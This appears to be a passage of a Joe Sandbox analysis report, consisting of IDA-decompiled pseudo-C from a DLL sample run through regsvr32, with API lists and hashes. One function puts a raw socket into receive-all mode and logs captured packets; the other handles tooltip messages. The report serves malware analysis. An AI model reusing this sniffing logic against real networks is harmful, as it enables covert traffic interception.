                                                                                                                				_t118 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t118 ^ _t316);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t306 = _a4;
                                                                                                                				_t121 = E100173A6();
                                                                                                                				_t301 = 0;
                                                                                                                				_t323 = _t121;
                                                                                                                				_t221 = 0 | _t323 == 0x00000000;
                                                                                                                				if(_t323 == 0) {
                                                                                                                					_t121 = E10001000(_t221, __edx, 0x80004005);
                                                                                                                				}
                                                                                                                				_t7 =  *((intOrPtr*)( *((intOrPtr*)( *_t121 + 0xc))))() + 0x10; // 0x10
                                                                                                                				_t214 = _t7;
                                                                                                                				_v1088 = _t214;
                                                                                                                				_t278 =  &_v1076;
                                                                                                                				_v4 = _t301;
                                                                                                                				_v1084 = _t301;
                                                                                                                				if(PeekMessageA(_t278,  *(_t306 + 0x20), 0x10, 0x10, _t301) != 0) {
                                                                                                                					L30:
                                                                                                                					__imp__#3( *((intOrPtr*)(_t306 + 0x74)));
                                                                                                                					_t81 = _t214 - 0x10; // 0x0
                                                                                                                					_t126 = _t81;
                                                                                                                					_v8 = 0xffffffff;
                                                                                                                					asm("lock xadd [ecx], edx");
                                                                                                                					_t280 = (_t278 | 0xffffffff) - 1;
                                                                                                                					if((_t278 | 0xffffffff) - 1 <= 0) {
                                                                                                                						_t280 =  *((intOrPtr*)( *_t126));
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t126)) + 4))))(_t126);
                                                                                                                					}
                                                                                                                					 *[fs:0x0] = _v16;
                                                                                                                					_pop(_t302);
                                                                                                                					_pop(_t307);
                                                                                                                					_pop(_t215);
                                                                                                                					return E1003B437(0, _t215, _v20 ^ _t316, _t280, _t302, _t307);
                                                                                                                				} else {
                                                                                                                					do {
                                                                                                                						_t132 = E1003BB70(_t301,  &_v1016, _t301, 0x3e8);
                                                                                                                						_t316 = _t316 + 0xc;
                                                                                                                						__imp__#16( *((intOrPtr*)(_t306 + 0x74)),  &_v1016, 0x3e8, _t301);
                                                                                                                						if(_t132 == 0xffffffff) {
                                                                                                                							goto L29;
                                                                                                                						} else {
                                                                                                                							__imp__#15(_v1030);
                                                                                                                							_t135 = SendMessageA( *(_t306 + 0x144), 0x1004, _t301, _t301);
                                                                                                                							_t303 = _t306 + 0x124;
                                                                                                                							E10026562(_t303, 1, _t135, 0x10056948, 0, 0, 0, 0);
                                                                                                                							_t216 = __imp__#12;
                                                                                                                							_t137 =  *_t216(_v1052);
                                                                                                                							E1002637C(_t303, SendMessageA( *(_t306 + 0x144), 0x1004, 0, 0) - 1, 1, _t137);
                                                                                                                							_t142 =  *_t216(_v1064);
                                                                                                                							E1002637C(_t303, SendMessageA( *(_t306 + 0x144), 0x1004, 0, 0) - 1, 2, _t142);
                                                                                                                							_t147 = E10010C40(_v1087 & 0x000000ff);
                                                                                                                							_t318 = _t316 + 4;
                                                                                                                							_t238 =  &_v1128 - _t147;
                                                                                                                							do {
                                                                                                                								_t284 =  *_t147;
                                                                                                                								 *((char*)(_t238 + _t147)) = _t284;
                                                                                                                								_t147 = _t147 + 1;
                                                                                                                							} while (_t284 != 0);
                                                                                                                							E1002637C(_t303, SendMessageA( *(_t306 + 0x144), 0x1004, 0, 0) - 1, 0,  &_v1076);
                                                                                                                							_t151 = _v1054;
                                                                                                                							__imp__#15(_t151);
                                                                                                                							_t217 = (_t151 & 0x0000ffff) + 0xffffffec & 0x0000ffff;
                                                                                                                							_t155 = (_v1051 & 0x000000ff) - 1;
                                                                                                                							if(_t155 == 0) {
                                                                                                                								_v1116 =  &_v1024;
                                                                                                                								__eflags = _t217;
                                                                                                                							} else {
                                                                                                                								_t196 = _t155 - 5;
                                                                                                                								if(_t196 == 0) {
                                                                                                                									__imp__#15(_v1028);
                                                                                                                									_v1120 =  &_v1012;
                                                                                                                									E10003500( &_v1124, 0x10058714, _v1028 & 0x0000ffff);
                                                                                                                									_t318 = _t318 + 0xc;
                                                                                                                									E1002637C(_t303, SendMessageA( *(_t306 + 0x144), 0x1004, 0, 0) - 1, 3, _v1124);
                                                                                                                									E100019E0( &_v1136);
                                                                                                                									_t217 = _t217 + 0xffec;
                                                                                                                								} else {
                                                                                                                									_t205 = _t196 == 0xb;
                                                                                                                									if(_t196 == 0xb) {
                                                                                                                										_v1116 =  &_v1020;
                                                                                                                										__imp__#15(_v1028);
                                                                                                                										E10003500( &_v1124, 0x10058714, _t205 & 0x0000ffff);
                                                                                                                										_t318 = _t318 + 0xc;
                                                                                                                										E1002637C(_t303, SendMessageA( *(_t306 + 0x144), 0x1004, 0, 0) - 1, 3, _v1124);
                                                                                                                										E100019E0( &_v1136);
                                                                                                                										_t217 = _t217 + 0xfff8;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							E10003500( &_v1120, 0x10058714, _t217 & 0x0000ffff);
                                                                                                                							_t214 = _v1120;
                                                                                                                							_t287 =  *(_t306 + 0x144);
                                                                                                                							_t316 = _t318 + 0xc;
                                                                                                                							E1002637C(_t303, SendMessageA(_t287, 0x1004, 0, 0) - 1, 4, _t214);
                                                                                                                							_t243 =  *(_t214 - 0x10);
                                                                                                                							_t161 = _t214 - 0x10;
                                                                                                                							_v1124 = _t243;
                                                                                                                							if( *(_t214 - 0xc) == 0) {
                                                                                                                								L20:
                                                                                                                								_t162 = _v1116;
                                                                                                                								if(_v1116 != 0) {
                                                                                                                									E10003500( &_v1120, " %s", _t162);
                                                                                                                									_t214 = _v1120;
                                                                                                                									_t287 =  *(_t306 + 0x144);
                                                                                                                									_t316 = _t316 + 0xc;
                                                                                                                									E1002637C(_t303, SendMessageA(_t287, 0x1004, 0, 0) - 1, 5, _t214);
                                                                                                                								}
                                                                                                                								_t303 =  *(_t214 - 0x10);
                                                                                                                								_t163 = _t214 - 0x10;
                                                                                                                								if( *(_t214 - 0xc) == 0) {
                                                                                                                									goto L29;
                                                                                                                								} else {
                                                                                                                									_t243 = _t163 + 0xc;
                                                                                                                									if( *(_t163 + 0xc) >= 0) {
                                                                                                                										asm("lock xadd [ecx], edx");
                                                                                                                										__eflags = (_t287 | 0xffffffff) - 1;
                                                                                                                										if((_t287 | 0xffffffff) - 1 <= 0) {
                                                                                                                											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t163)) + 4))))(_t163);
                                                                                                                										}
                                                                                                                										_t75 =  *((intOrPtr*)( *((intOrPtr*)( *_t303 + 0xc))))() + 0x10; // 0x10
                                                                                                                										_t214 = _t75;
                                                                                                                										_v1120 = _t214;
                                                                                                                										goto L29;
                                                                                                                									} else {
                                                                                                                										if( *((intOrPtr*)(_t214 - 8)) < 0) {
                                                                                                                											goto L33;
                                                                                                                										} else {
                                                                                                                											 *(_t214 - 0xc) = 0;
                                                                                                                											 *_t214 = 0;
                                                                                                                											goto L29;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_t287 = _t161 + 0xc;
                                                                                                                								if( *(_t161 + 0xc) >= 0) {
                                                                                                                									asm("lock xadd [edx], ebx");
                                                                                                                									__eflags = (_t214 | 0xffffffff) - 1;
                                                                                                                									if((_t214 | 0xffffffff) - 1 <= 0) {
                                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t161)) + 4))))(_t161);
                                                                                                                										_t243 = _v1116;
                                                                                                                									}
                                                                                                                									_t287 =  *_t243;
                                                                                                                									_t60 =  *((intOrPtr*)( *((intOrPtr*)(_t287 + 0xc))))() + 0x10; // 0x10
                                                                                                                									_t214 = _t60;
                                                                                                                									_v1120 = _t214;
                                                                                                                									goto L20;
                                                                                                                								} else {
                                                                                                                									if( *((intOrPtr*)(_t214 - 8)) < 0) {
                                                                                                                										L33:
                                                                                                                										E10001000(_t243, _t287, 0x80070057);
                                                                                                                										asm("int3");
                                                                                                                										asm("int3");
                                                                                                                										asm("int3");
                                                                                                                										asm("int3");
                                                                                                                										asm("int3");
                                                                                                                										asm("int3");
                                                                                                                										asm("int3");
                                                                                                                										asm("int3");
                                                                                                                										asm("int3");
                                                                                                                										asm("int3");
                                                                                                                										_t319 = _t316 - 0xd0;
                                                                                                                										_t169 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                										_v1148 = _t169 ^ _t319;
                                                                                                                										_push(_t306);
                                                                                                                										_t308 = _t243;
                                                                                                                										_t171 = E1002181C(_t214, _t303, _t308, __eflags, 0x10058c8c, 0x24, 0);
                                                                                                                										__eflags = _t171 - 6;
                                                                                                                										if(_t171 != 6) {
                                                                                                                											L39:
                                                                                                                											_pop(_t309);
                                                                                                                											__eflags = _v1148 ^ _t319;
                                                                                                                											return E1003B437(_t171, _t214, _v1148 ^ _t319, _t287, _t303, _t309);
                                                                                                                										} else {
                                                                                                                											__imp__#23(2, 3, 0, _t303);
                                                                                                                											_t308[0x1d] = _t171;
                                                                                                                											_t174 = E1003BB70(_t303,  &_v1288, 0, 0x80);
                                                                                                                											_t319 = _t319 + 0xc;
                                                                                                                											__imp__#52( &_v1288);
                                                                                                                											_t175 =  *((intOrPtr*)( *((intOrPtr*)(_t174 + 0xc))));
                                                                                                                											__imp__#12( *_t175);
                                                                                                                											__imp__#11(_t175);
                                                                                                                											_t176 = _t308[0x1d];
                                                                                                                											_v1372 = 0xfa0;
                                                                                                                											__imp__#21(_t176, 0xffff, 0x1006,  &_v1372, 4);
                                                                                                                											_v1336 = 2;
                                                                                                                											__imp__#9(0x2bc);
                                                                                                                											_t294 = _t308[0x1d];
                                                                                                                											_v1338 = _t176;
                                                                                                                											_v1336 = _t175;
                                                                                                                											__imp__#2(_t308[0x1d],  &_v1340, 0x10);
                                                                                                                											__eflags = _t176 - 0xffffffff;
                                                                                                                											_pop(_t303);
                                                                                                                											_push(0);
                                                                                                                											_push(0);
                                                                                                                											if(_t176 != 0xffffffff) {
                                                                                                                												_t178 = _t308[0x1d];
                                                                                                                												_v1404 = 1;
                                                                                                                												_v1412 = 0;
                                                                                                                												__imp__WSAIoctl(_t178, 0x98000001,  &_v1404, 4,  &_v1392, 0x28,  &_v1412);
                                                                                                                												__eflags = _t178 - 0xffffffff;
                                                                                                                												_push(0);
                                                                                                                												_push(0);
                                                                                                                												if(__eflags != 0) {
                                                                                                                													_push(0);
                                                                                                                													_push(0xfffffff1);
                                                                                                                													_push(_t308);
                                                                                                                													_push(E10010ED0);
                                                                                                                													_t308[0x1e] = E10023C00(_t214,  &_v1404, _t303, _t308, __eflags);
                                                                                                                													E1001D39A( &(_t308[0x34]), 0);
                                                                                                                													E1001D39A( &(_t308[0x1f]), 1);
                                                                                                                													_t254 =  *0x1006f050; // 0x0
                                                                                                                													E1000BDC0(_t254);
                                                                                                                													_t255 =  *0x1006f050; // 0x0
                                                                                                                													_t287 =  &_v1468;
                                                                                                                													__eflags = _t255 + 0x2a0;
                                                                                                                													E10001310( &_v1468, "Processing2");
                                                                                                                													_t171 = E1001614A( &_v1476);
                                                                                                                													goto L39;
                                                                                                                												} else {
                                                                                                                													_t184 = E10018B24(_t308);
                                                                                                                													__imp__#3(_t308[0x1d], 0x10058c6c);
                                                                                                                													_pop(_t310);
                                                                                                                													__eflags = _v1260 ^ _t319;
                                                                                                                													return E1003B437(_t184, _t214, _v1260 ^ _t319,  &_v1404, _t303, _t310);
                                                                                                                												}
                                                                                                                											} else {
                                                                                                                												_t186 = E10018B24(_t308);
                                                                                                                												_t311 = 0x10058c7c;
                                                                                                                												__eflags = _v1220 ^ _t319;
                                                                                                                												return E1003B437(_t186, _t214, _v1220 ^ _t319, _t294, _t303, _t311);
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										 *(_t214 - 0xc) = 0;
                                                                                                                										 *_t214 = 0;
                                                                                                                										goto L20;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L40;
                                                                                                                						L29:
                                                                                                                						_t301 = 0;
                                                                                                                						_t278 =  &_v1092;
                                                                                                                						_v1100 = 0;
                                                                                                                					} while (PeekMessageA(_t278,  *(_t306 + 0x20), 0x10, 0x10, 0) == 0);
                                                                                                                					goto L30;
                                                                                                                				}
                                                                                                                				L40:
                                                                                                                			}

                                                                                                                0x100113d9
                                                                                                                0x100113dd
                                                                                                                0x100113e3
                                                                                                                0x100113e6
                                                                                                                0x100113e7
                                                                                                                0x100113e9
                                                                                                                0x100113eb
                                                                                                                0x10011414
                                                                                                                0x1001142b
                                                                                                                0x10011433
                                                                                                                0x1001143b
                                                                                                                0x10011441
                                                                                                                0x10011444
                                                                                                                0x10011446
                                                                                                                0x10011448
                                                                                                                0x10011476
                                                                                                                0x10011478
                                                                                                                0x1001147a
                                                                                                                0x1001147b
                                                                                                                0x1001148d
                                                                                                                0x10011490
                                                                                                                0x1001149a
                                                                                                                0x1001149f
                                                                                                                0x100114a5
                                                                                                                0x100114aa
                                                                                                                0x100114b5
                                                                                                                0x100114ba
                                                                                                                0x100114c0
                                                                                                                0x100114c9
                                                                                                                0x00000000
                                                                                                                0x1001144a
                                                                                                                0x10011451
                                                                                                                0x1001145a
                                                                                                                0x10011460
                                                                                                                0x10011468
                                                                                                                0x10011475
                                                                                                                0x10011475
                                                                                                                0x100113ed
                                                                                                                0x100113f4
                                                                                                                0x100113f9
                                                                                                                0x10011401
                                                                                                                0x1001140e
                                                                                                                0x1001140e
                                                                                                                0x100113eb
                                                                                                                0x100111cb
                                                                                                                0x100111cb
                                                                                                                0x100111d2
                                                                                                                0x00000000
                                                                                                                0x100111d2
                                                                                                                0x100111c5
                                                                                                                0x100111bf
                                                                                                                0x100111b6
                                                                                                                0x00000000
                                                                                                                0x1001128f
                                                                                                                0x10011292
                                                                                                                0x1001129a
                                                                                                                0x1001129f
                                                                                                                0x100112a9
                                                                                                                0x00000000
                                                                                                                0x10010f70
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Send$inet_ntoa$Peek_memsethtonsrecv
                                                                                                                • String ID: %s$Processing2
                                                                                                                • API String ID: 2681355637-1361235676
                                                                                                                • Opcode ID: cdd757c6b4f9e7ea5c63c7eb1175f28c53492f38c1bdd4e227a2cf65ed6f66fe
                                                                                                                • Instruction ID: 50aedd54bdc28c244f4d6f6d851c8870d4df88a5ac4d8c736e694ce555374ffb
                                                                                                                • Opcode Fuzzy Hash: cdd757c6b4f9e7ea5c63c7eb1175f28c53492f38c1bdd4e227a2cf65ed6f66fe
                                                                                                                • Instruction Fuzzy Hash: AD027C74200740AFE325CB64CC86FABB7E9EB88714F104A1CF2559B2D1DBB5E945CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E100392CA(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t114;
                                                                                                                				signed int _t115;
                                                                                                                				signed int _t116;
                                                                                                                				signed int _t118;
                                                                                                                				intOrPtr _t122;
                                                                                                                				long _t131;
                                                                                                                				signed int _t138;
                                                                                                                				signed int _t139;
                                                                                                                				void* _t143;
                                                                                                                				signed int _t147;
                                                                                                                				signed int _t148;
                                                                                                                				void* _t156;
                                                                                                                				intOrPtr* _t163;
                                                                                                                				signed int _t175;
                                                                                                                				signed int _t176;
                                                                                                                				signed int _t179;
                                                                                                                				void* _t181;
                                                                                                                				signed short _t190;
                                                                                                                				intOrPtr _t192;
                                                                                                                				void* _t200;
                                                                                                                				void* _t204;
                                                                                                                				void* _t205;
                                                                                                                				void* _t207;
                                                                                                                
                                                                                                                				_t165 = __ecx;
                                                                                                                				_push(0x7c);
                                                                                                                				_t109 = E1003D1E6(E10054DD7, __ebx, __edi, __esi);
                                                                                                                				_t200 = __ecx;
                                                                                                                				 *(_t204 - 0x10) = __ecx;
                                                                                                                				_t163 =  *((intOrPtr*)(_t204 + 8));
                                                                                                                				_t190 =  *(_t163 + 4);
                                                                                                                				 *(_t204 - 0x1c) = _t190;
                                                                                                                				if(_t190 == 0x200 || _t190 == 0xa0 || _t190 == 0x202 || _t190 == 0x205 || _t190 == 0x208) {
                                                                                                                					if(GetKeyState(1) < 0 || GetKeyState(2) < 0) {
                                                                                                                						L49:
                                                                                                                						_t190 =  *(_t204 - 0x1c);
                                                                                                                						goto L50;
                                                                                                                					} else {
                                                                                                                						_t109 = GetKeyState(4);
                                                                                                                						_t217 = _t109;
                                                                                                                						if(_t109 < 0) {
                                                                                                                							goto L49;
                                                                                                                						} else {
                                                                                                                							_t114 = E100231BA(_t163, _t165, GetKeyState, _t200, _t217);
                                                                                                                							_push( *_t163);
                                                                                                                							_t192 = _t114;
                                                                                                                							 *((intOrPtr*)(_t204 - 0x18)) = _t192;
                                                                                                                							while(1) {
                                                                                                                								_t109 = E10019C16(_t163, _t165, _t204);
                                                                                                                								if(_t109 == 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								__eflags =  *(_t109 + 0x3c) & 0x00000401;
                                                                                                                								if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
                                                                                                                									break;
                                                                                                                								} else {
                                                                                                                									_push(GetParent( *(_t109 + 0x20)));
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							if(_t109 == _t200) {
                                                                                                                								_t164 =  *(_t192 + 0x3c);
                                                                                                                								_t115 = E10019F01(_t200);
                                                                                                                								__eflags = _t164;
                                                                                                                								 *(_t204 - 0x14) = _t115;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									L19:
                                                                                                                									_t116 = E100160BC(__eflags, 0x70);
                                                                                                                									 *(_t204 - 0x1c) = _t116;
                                                                                                                									_t164 = 0;
                                                                                                                									__eflags = _t116;
                                                                                                                									 *(_t204 - 4) = 0;
                                                                                                                									if(__eflags != 0) {
                                                                                                                										_t164 = E10038FF9(0, _t116, _t192, _t200, __eflags);
                                                                                                                									}
                                                                                                                									 *(_t204 - 4) =  *(_t204 - 4) | 0xffffffff;
                                                                                                                									_t118 =  *((intOrPtr*)( *_t164 + 0x134))( *(_t204 - 0x14), 1);
                                                                                                                									__eflags = _t118;
                                                                                                                									if(_t118 != 0) {
                                                                                                                										SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
                                                                                                                										_t200 =  *(_t204 - 0x10);
                                                                                                                										 *(_t192 + 0x3c) = _t164;
                                                                                                                										L24:
                                                                                                                										E1003BB70(_t192, _t204 - 0x88, 0, 0x30);
                                                                                                                										_t122 =  *((intOrPtr*)(_t204 + 8));
                                                                                                                										 *((intOrPtr*)(_t204 - 0x24)) =  *((intOrPtr*)(_t122 + 0x18));
                                                                                                                										 *(_t204 - 0x28) =  *(_t122 + 0x14);
                                                                                                                										ScreenToClient( *(_t200 + 0x20), _t204 - 0x28);
                                                                                                                										E1003BB70(_t192, _t204 - 0x58, 0, 0x30);
                                                                                                                										_t207 = _t205 + 0x18;
                                                                                                                										 *(_t204 - 0x58) = 0x28;
                                                                                                                										_t109 =  *((intOrPtr*)( *_t200 + 0x6c))( *(_t204 - 0x28),  *((intOrPtr*)(_t204 - 0x24)), _t204 - 0x58);
                                                                                                                										asm("sbb ecx, ecx");
                                                                                                                										_t175 =  ~(_t109 + 1) & _t200;
                                                                                                                										__eflags =  *(_t192 + 0x44) - _t109;
                                                                                                                										 *(_t204 - 0x1c) = _t109;
                                                                                                                										 *(_t204 - 0x14) = _t175;
                                                                                                                										if( *(_t192 + 0x44) != _t109) {
                                                                                                                											L30:
                                                                                                                											__eflags = _t109 - 0xffffffff;
                                                                                                                											if(_t109 == 0xffffffff) {
                                                                                                                												SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
                                                                                                                												L39:
                                                                                                                												E1003924C(_t164,  *((intOrPtr*)(_t204 + 8)));
                                                                                                                												_t131 =  *(_t192 + 0x48);
                                                                                                                												__eflags = _t131;
                                                                                                                												if(_t131 != 0) {
                                                                                                                													__eflags =  *_t131 - 0x28;
                                                                                                                													if( *_t131 >= 0x28) {
                                                                                                                														SendMessageA( *(_t164 + 0x20), 0x405, 0, _t131);
                                                                                                                													}
                                                                                                                												}
                                                                                                                												__eflags =  *(_t192 + 0x48);
                                                                                                                												 *(_t192 + 0x40) =  *(_t204 - 0x14);
                                                                                                                												 *(_t192 + 0x44) =  *(_t204 - 0x1c);
                                                                                                                												if(__eflags == 0) {
                                                                                                                													 *(_t192 + 0x48) = E100160BC(__eflags, 0x30);
                                                                                                                													E1003BB70(_t192, _t134, 0, 0x30);
                                                                                                                													_t207 = _t207 + 0x10;
                                                                                                                												}
                                                                                                                												_t176 = 0xc;
                                                                                                                												_t200 = _t204 - 0x58;
                                                                                                                												_t109 = memcpy( *(_t192 + 0x48), _t200, _t176 << 2);
                                                                                                                												_t192 = _t200 + _t176 + _t176;
                                                                                                                												L45:
                                                                                                                												__eflags =  *((intOrPtr*)(_t204 - 0x34)) - 0xffffffff;
                                                                                                                												if( *((intOrPtr*)(_t204 - 0x34)) != 0xffffffff) {
                                                                                                                													__eflags =  *(_t204 - 0x38);
                                                                                                                													if(__eflags == 0) {
                                                                                                                														_push( *((intOrPtr*)(_t204 - 0x34)));
                                                                                                                														_t109 = E1003B59D(_t164, _t192, _t200, __eflags);
                                                                                                                													}
                                                                                                                												}
                                                                                                                												goto L77;
                                                                                                                											}
                                                                                                                											_t179 = 0xc;
                                                                                                                											_t138 = memcpy(_t204 - 0x88, _t204 - 0x58, _t179 << 2);
                                                                                                                											_t207 = _t207 + 0xc;
                                                                                                                											_t181 =  *(_t204 - 0x10);
                                                                                                                											_t139 = _t138 & 0x3fffffff;
                                                                                                                											__eflags =  *(_t181 + 0x3c) & 0x00000400;
                                                                                                                											 *(_t204 - 0x84) = _t139;
                                                                                                                											if(( *(_t181 + 0x3c) & 0x00000400) != 0) {
                                                                                                                												_t148 = _t139 | 0x00000020;
                                                                                                                												__eflags = _t148;
                                                                                                                												 *(_t204 - 0x84) = _t148;
                                                                                                                											}
                                                                                                                											SendMessageA( *(_t164 + 0x20), 0x404, 0, _t204 - 0x88);
                                                                                                                											__eflags =  *(_t204 - 0x54) & 0x40000000;
                                                                                                                											if(( *(_t204 - 0x54) & 0x40000000) != 0) {
                                                                                                                												L35:
                                                                                                                												SendMessageA( *(_t164 + 0x20), 0x401, 1, 0);
                                                                                                                												_t143 =  *(_t204 - 0x10);
                                                                                                                												__eflags =  *(_t143 + 0x3c) & 0x00000400;
                                                                                                                												if(( *(_t143 + 0x3c) & 0x00000400) != 0) {
                                                                                                                													SendMessageA( *(_t164 + 0x20), 0x411, 1, _t204 - 0x88);
                                                                                                                												}
                                                                                                                												SetWindowPos( *(_t164 + 0x20), 0, 0, 0, 0, 0, 0x213);
                                                                                                                												goto L38;
                                                                                                                											} else {
                                                                                                                												_t147 = E1001BFD0(_t164,  *(_t204 - 0x10), 0x400);
                                                                                                                												__eflags = _t147;
                                                                                                                												if(_t147 == 0) {
                                                                                                                													L38:
                                                                                                                													_t192 =  *((intOrPtr*)(_t204 - 0x18));
                                                                                                                													goto L39;
                                                                                                                												}
                                                                                                                												goto L35;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										__eflags =  *(_t192 + 0x40) - _t175;
                                                                                                                										if( *(_t192 + 0x40) != _t175) {
                                                                                                                											goto L30;
                                                                                                                										}
                                                                                                                										__eflags =  *(_t200 + 0x3c) & 0x00000400;
                                                                                                                										if(( *(_t200 + 0x3c) & 0x00000400) == 0) {
                                                                                                                											__eflags = _t109 - 0xffffffff;
                                                                                                                											if(_t109 != 0xffffffff) {
                                                                                                                												_t109 = E1003924C(_t164,  *((intOrPtr*)(_t204 + 8)));
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											GetCursorPos(_t204 - 0x20);
                                                                                                                											_t109 = SendMessageA( *(_t164 + 0x20), 0x412, 0, ( *(_t204 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t204 - 0x20) & 0x0000ffff);
                                                                                                                										}
                                                                                                                										goto L45;
                                                                                                                									} else {
                                                                                                                										_t109 =  *((intOrPtr*)( *_t164 + 4))(1);
                                                                                                                										goto L77;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								_t156 = E1001AD94(_t164);
                                                                                                                								__eflags = _t156 -  *(_t204 - 0x14);
                                                                                                                								if(_t156 !=  *(_t204 - 0x14)) {
                                                                                                                									 *((intOrPtr*)( *_t164 + 0x60))();
                                                                                                                									 *((intOrPtr*)( *_t164 + 4))(1);
                                                                                                                									_t164 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                									 *(_t192 + 0x3c) = 0;
                                                                                                                								}
                                                                                                                								__eflags = _t164;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									goto L24;
                                                                                                                								} else {
                                                                                                                									goto L19;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								if(_t109 == 0) {
                                                                                                                									 *(_t192 + 0x40) =  *(_t192 + 0x40) & _t109;
                                                                                                                									 *(_t192 + 0x44) =  *(_t192 + 0x44) | 0xffffffff;
                                                                                                                								}
                                                                                                                								goto L77;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L50:
                                                                                                                					__eflags =  *(_t200 + 0x3c) & 0x00000401;
                                                                                                                					if(( *(_t200 + 0x3c) & 0x00000401) == 0) {
                                                                                                                						L77:
                                                                                                                						return E1003D2BE(_t109);
                                                                                                                					}
                                                                                                                					_push( *_t163);
                                                                                                                					while(1) {
                                                                                                                						_t109 = E10019C16(_t163, _t165, _t204);
                                                                                                                						__eflags = _t109;
                                                                                                                						if(_t109 == 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						__eflags = _t109 - _t200;
                                                                                                                						if(_t109 == _t200) {
                                                                                                                							L57:
                                                                                                                							__eflags = _t190 - 0x100;
                                                                                                                							if(_t190 < 0x100) {
                                                                                                                								L59:
                                                                                                                								__eflags = _t190 - 0x104 - 3;
                                                                                                                								if(_t190 - 0x104 > 3) {
                                                                                                                									_t109 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                									L62:
                                                                                                                									__eflags =  *(_t200 + 0x3c) & 0x00000400;
                                                                                                                									if(( *(_t200 + 0x3c) & 0x00000400) != 0) {
                                                                                                                										goto L77;
                                                                                                                									}
                                                                                                                									__eflags = _t109;
                                                                                                                									if(__eflags != 0) {
                                                                                                                										L76:
                                                                                                                										_t109 = E10018992(_t165, __eflags, _t109);
                                                                                                                										goto L77;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0x201;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0x203;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0x204;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0x206;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0x207;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0x209;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0xa1;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0xa3;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0xa4;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0xa6;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0xa7;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0xa9;
                                                                                                                									if(__eflags != 0) {
                                                                                                                										goto L77;
                                                                                                                									}
                                                                                                                									goto L76;
                                                                                                                								}
                                                                                                                								L60:
                                                                                                                								_t109 = 1;
                                                                                                                								goto L62;
                                                                                                                							}
                                                                                                                							__eflags = _t190 - 0x109;
                                                                                                                							if(_t190 <= 0x109) {
                                                                                                                								goto L60;
                                                                                                                							}
                                                                                                                							goto L59;
                                                                                                                						}
                                                                                                                						__eflags =  *(_t109 + 0x3c) & 0x00000401;
                                                                                                                						if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_push(GetParent( *(_t109 + 0x20)));
                                                                                                                					}
                                                                                                                					__eflags = _t109 - _t200;
                                                                                                                					if(_t109 != _t200) {
                                                                                                                						goto L77;
                                                                                                                					}
                                                                                                                					goto L57;
                                                                                                                				}
                                                                                                                			}


























                                                                                                                0x1003940e
                                                                                                                0x10039419
                                                                                                                0x1003941e
